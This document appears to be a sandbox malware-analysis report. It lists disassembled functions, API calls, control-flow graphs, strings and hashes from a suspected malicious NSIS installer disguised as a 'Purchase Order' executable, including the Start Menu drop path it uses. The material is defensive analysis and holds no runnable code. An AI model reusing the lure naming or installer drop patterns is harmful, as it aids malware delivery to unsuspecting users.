                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 3441113951-356164803
                                            • Opcode ID: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                            • Instruction ID: 34b402965a056e7880f406cddf034ee68ffb155d70387f36a3cc73b0da0a8952
                                            • Opcode Fuzzy Hash: 00f1125170beacb68a51aa9e102c224c57c9f0831100800300306249a148e2be
                                            • Instruction Fuzzy Hash: FBD11571500310ABE720BF659D45B2B3AACEB4074AF10447FF881B62E1DBBD9E45876E
                                            Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 139 404c9e-404cea GetDlgItem * 2 140 404cf0-404d84 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404f0b-404f12 139->141 142 404d93-404d9a DeleteObject 140->142 143 404d86-404d91 SendMessageW 140->143 144 404f14-404f24 141->144 145 404f26 141->145 147 404d9c-404da4 142->147 143->142 146 404f29-404f32 144->146 145->146 148 404f34-404f37 146->148 149 404f3d-404f43 146->149 150 404da6-404da9 147->150 151 404dcd-404dd1 147->151 148->149 152 405021-405028 148->152 155 404f52-404f59 149->155 156 404f45-404f4c 149->156 153 404dab 150->153 154 404dae-404dcb call 4062dc SendMessageW * 2 150->154 151->147 157 404dd3-404dff call 404231 * 2 151->157 162 405099-4050a1 152->162 163 40502a-405030 152->163 153->154 154->151 159 404f5b-404f5e 155->159 160 404fce-404fd1 155->160 156->152 156->155 195 404e05-404e0b 157->195 196 404eca-404edd GetWindowLongW SetWindowLongW 157->196 168 404f60-404f67 159->168 169 404f69-404f7e call 404bec 159->169 160->152 164 404fd3-404fdd 160->164 166 4050a3-4050a9 SendMessageW 162->166 167 4050ab-4050b2 162->167 171 405281-405293 call 404298 163->171 172 405036-405040 163->172 174 404fed-404ff7 164->174 175 404fdf-404feb SendMessageW 164->175 166->167 176 4050b4-4050bb 167->176 177 4050e6-4050ed 167->177 168->160 168->169 169->160 194 404f80-404f91 169->194 172->171 180 405046-405055 SendMessageW 172->180 174->152 182 404ff9-405003 174->182 175->174 183 4050c4-4050cb 176->183 184 4050bd-4050be ImageList_Destroy 176->184 187 405243-40524a 177->187 188 4050f3-4050ff call 4011ef 177->188 180->171 189 40505b-40506c SendMessageW 180->189 190 405014-40501e 182->190 191 405005-405012 182->191 192 4050d4-4050e0 183->192 193 4050cd-4050ce GlobalFree 183->193 184->183 187->171 200 40524c-405253 187->200 214 405101-405104 188->214 215 40510f-405112 188->215 198 405076-405078 189->198 199 40506e-405074 189->199 190->152 191->152 192->177 193->192 194->160 203 404f93-404f95 194->203 204 404e0e-404e15 195->204 202 404ee3-404ee7 196->202 206 405079-405092 call 401299 SendMessageW 198->206 199->198 199->206 200->171 201 405255-40527f ShowWindow GetDlgItem ShowWindow 200->201 201->171 208 404f01-404f09 call 404266 202->208 209 404ee9-404efc ShowWindow call 404266 202->209 210 404f97-404f9e 203->210 211 404fa8 203->211 212 404eab-404ebe 204->212 213 404e1b-404e43 204->213 206->162 208->141 209->171 222 404fa0-404fa2 210->222 223 404fa4-404fa6 210->223 226 404fab-404fc7 call 40117d 211->226 212->204 217 404ec4-404ec8 212->217 224 404e45-404e7b SendMessageW 213->224 225 404e7d-404e7f 213->225 227 405106 214->227 228 405107-40510a call 404c6c 214->228 218 405153-405177 call 4011ef 215->218 219 405114-40512d call 4012e2 call 401299 215->219 217->196 217->202 241 405219-40522d InvalidateRect 218->241 242 40517d 218->242 246 40513d-40514c SendMessageW 219->246 247 40512f-405135 219->247 222->226 223->226 224->212 234 404e81-404e90 SendMessageW 225->234 235 404e92-404ea8 SendMessageW 225->235 226->160 227->228 228->215 234->212 235->212 241->187 245 40522f-40523e call 404bbf call 404ba7 241->245 243 405180-40518b 242->243 248 405201-405213 243->248 249 40518d-40519c 243->249 245->187 246->218 253 405137 247->253 254 405138-40513b 247->254 248->241 248->243 251 40519e-4051ab 249->251 252 4051af-4051b2 249->252 251->252 256 4051b4-4051b7 252->256 257 4051b9-4051c2 252->257 253->254 254->246 254->247 259 4051c7-4051ff SendMessageW * 2 256->259 257->259 260 4051c4 257->260 259->248 260->259
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                            • GetDlgItem.USER32(?,?), ref: 00404CC1
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404D0B
                                            • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                            • SetWindowLongW.USER32(?,?,00405296), ref: 00404D37
                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404D4B
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                            • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404D91
                                            • DeleteObject.GDI32(00000000), ref: 00404D94
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                            • GetWindowLongW.USER32(?,?), ref: 00404ECF
                                            • SetWindowLongW.USER32(?,?,00000000), ref: 00404EDD
                                            • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405065
                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00405089
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                            • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                            • GlobalFree.KERNEL32(?), ref: 004050CE
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                            • ShowWindow.USER32(?,00000000), ref: 0040526D
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                            • ShowWindow.USER32(00000000), ref: 0040527F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                            • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                            • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                            • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                            Function 004059CC Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 569 4059cc-4059f2 call 405c97 572 4059f4-405a06 DeleteFileW 569->572 573 405a0b-405a12 569->573 574 405b88-405b8c 572->574 575 405a14-405a16 573->575 576 405a25-405a35 call 4062ba 573->576 577 405b36-405b3b 575->577 578 405a1c-405a1f 575->578 582 405a44-405a45 call 405bdb 576->582 583 405a37-405a42 lstrcatW 576->583 577->574 581 405b3d-405b40 577->581 578->576 578->577 584 405b42-405b48 581->584 585 405b4a-405b52 call 4065fd 581->585 586 405a4a-405a4e 582->586 583->586 584->574 585->574 593 405b54-405b68 call 405b8f call 405984 585->593 589 405a50-405a58 586->589 590 405a5a-405a60 lstrcatW 586->590 589->590 592 405a65-405a81 lstrlenW FindFirstFileW 589->592 590->592 595 405a87-405a8f 592->595 596 405b2b-405b2f 592->596 609 405b80-405b83 call 405322 593->609 610 405b6a-405b6d 593->610 599 405a91-405a99 595->599 600 405aaf-405ac3 call 4062ba 595->600 596->577 598 405b31 596->598 598->577 601 405a9b-405aa3 599->601 602 405b0e-405b1e FindNextFileW 599->602 611 405ac5-405acd 600->611 612 405ada-405ae5 call 405984 600->612 601->600 605 405aa5-405aad 601->605 602->595 608 405b24-405b25 FindClose 602->608 605->600 605->602 608->596 609->574 610->584 613 405b6f-405b7e call 405322 call 406080 610->613 611->602 614 405acf-405ad8 call 4059cc 611->614 622 405b06-405b09 call 405322 612->622 623 405ae7-405aea 612->623 613->574 614->602 622->602 626 405aec-405afc call 405322 call 406080 623->626 627 405afe-405b04 623->627 626->602 627->602
                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059F5
                                            • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A3D
                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A60
                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A66
                                            • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A76
                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                            • FindClose.KERNEL32(00000000), ref: 00405B25
                                            Strings
                                            • \*.*, xrefs: 00405A37
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 004059CC
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059DA
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                            • API String ID: 2035342205-3880770136
                                            • Opcode ID: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                            • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                            • Opcode Fuzzy Hash: b938c9d9068cedab339b19568100d2823c17cca8f6ff83e158d789dc8ab7bbfb
                                            • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                            Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 762 40264a-402663 call 402c1f 765 402ac5-402ac8 762->765 766 402669-402670 762->766 767 402ace-402ad4 765->767 768 402672 766->768 769 402675-402678 766->769 768->769 771 4027dc-4027e4 769->771 772 40267e-40268d call 40621a 769->772 771->765 772->771 775 402693 772->775 776 402699-40269d 775->776 777 402732-402735 776->777 778 4026a3-4026be ReadFile 776->778 780 402737-40273a 777->780 781 40274d-40275d call 405e33 777->781 778->771 779 4026c4-4026c9 778->779 779->771 783 4026cf-4026dd 779->783 780->781 784 40273c-402747 call 405e91 780->784 781->771 789 40275f 781->789 786 4026e3-4026f5 MultiByteToWideChar 783->786 787 402798-4027a4 call 406201 783->787 784->771 784->781 786->789 790 4026f7-4026fa 786->790 787->767 793 402762-402765 789->793 794 4026fc-402707 790->794 793->787 796 402767-40276c 793->796 794->793 797 402709-40272e SetFilePointer MultiByteToWideChar 794->797 798 4027a9-4027ad 796->798 799 40276e-402773 796->799 797->794 800 402730 797->800 802 4027ca-4027d6 SetFilePointer 798->802 803 4027af-4027b3 798->803 799->798 801 402775-402788 799->801 800->789 801->771 804 40278a-402790 801->804 802->771 805 4027b5-4027b9 803->805 806 4027bb-4027c8 803->806 804->776 807 402796 804->807 805->802 805->806 806->771 807->771
                                            APIs
                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                            • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                              • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                            • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                            • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                            • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                            Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 004021C3
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                            • API String ID: 542301482-2950068324
                                            • Opcode ID: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                            • Instruction ID: d410e27007f87fae541732bdb1cbefdb239a2090c9e466904aadd755c5c79360
                                            • Opcode Fuzzy Hash: 714c7101a6a6f2cf7f8fe42ac075d02e6e28feee2daec90006456647ac2afcb3
                                            • Instruction Fuzzy Hash: 0D413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                            Function 004065FD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CE0,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420), ref: 00406608
                                            • FindClose.KERNEL32(00000000), ref: 00406614
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID:
                                            • API String ID: 2295610775-0
                                            • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                            • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                            • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                            • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                            Function 00403D58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 403d58-403d6a 262 403d70-403d76 261->262 263 403eab-403eba 261->263 262->263 266 403d7c-403d85 262->266 264 403f09-403f1e 263->264 265 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 263->265 268 403f20-403f23 264->268 269 403f5e-403f63 call 40427d 264->269 265->264 270 403d87-403d94 SetWindowPos 266->270 271 403d9a-403d9d 266->271 275 403f25-403f30 call 401389 268->275 276 403f56-403f58 268->276 283 403f68-403f83 269->283 270->271 272 403db7-403dbd 271->272 273 403d9f-403db1 ShowWindow 271->273 278 403dd9-403ddc 272->278 279 403dbf-403dd4 DestroyWindow 272->279 273->272 275->276 298 403f32-403f51 SendMessageW 275->298 276->269 282 4041fe 276->282 287 403dde-403dea SetWindowLongW 278->287 288 403def-403df5 278->288 284 4041db-4041e1 279->284 286 404200-404207 282->286 290 403f85-403f87 call 40140b 283->290 291 403f8c-403f92 283->291 284->282 293 4041e3-4041e9 284->293 287->286 296 403e98-403ea6 call 404298 288->296 297 403dfb-403e0c GetDlgItem 288->297 290->291 294 403f98-403fa3 291->294 295 4041bc-4041d5 DestroyWindow EndDialog 291->295 293->282 299 4041eb-4041f4 ShowWindow 293->299 294->295 300 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 294->300 295->284 296->286 301 403e2b-403e2e 297->301 302 403e0e-403e25 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 300->331 332 403ff8-403ffd 300->332 305 403e30-403e31 301->305 306 403e33-403e36 301->306 302->282 302->301 309 403e61-403e66 call 40420a 305->309 310 403e44-403e49 306->310 311 403e38-403e3e 306->311 309->296 315 403e7f-403e92 SendMessageW 310->315 316 403e4b-403e51 310->316 314 403e40-403e42 311->314 311->315 314->309 315->296 317 403e53-403e59 call 40140b 316->317 318 403e68-403e71 call 40140b 316->318 327 403e5f 317->327 318->296 328 403e73-403e7d 318->328 327->309 328->327 335 404041 331->335 336 40403e-40403f 331->336 332->331 337 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404073-404084 SendMessageW 337->338 339 404086 337->339 340 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 338->340 339->340 340->283 351 4040d1-4040d3 340->351 351->283 352 4040d9-4040dd 351->352 353 4040fc-404110 DestroyWindow 352->353 354 4040df-4040e5 352->354 353->284 356 404116-404143 CreateDialogParamW 353->356 354->282 355 4040eb-4040f1 354->355 355->283 357 4040f7 355->357 356->284 358 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4041a2-4041ba ShowWindow call 40427d 358->363 363->284
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                            • ShowWindow.USER32(?), ref: 00403DB1
                                            • DestroyWindow.USER32 ref: 00403DC5
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                            • GetDlgItem.USER32(?,?), ref: 00403E02
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                            • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                            • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                            • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                            • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                            • ShowWindow.USER32(00000000,?), ref: 00404007
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                            • EnableWindow.USER32(?,?), ref: 00404034
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                            • EnableMenuItem.USER32(00000000), ref: 00404051
                                            • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404069
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                            • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                            • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                            • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
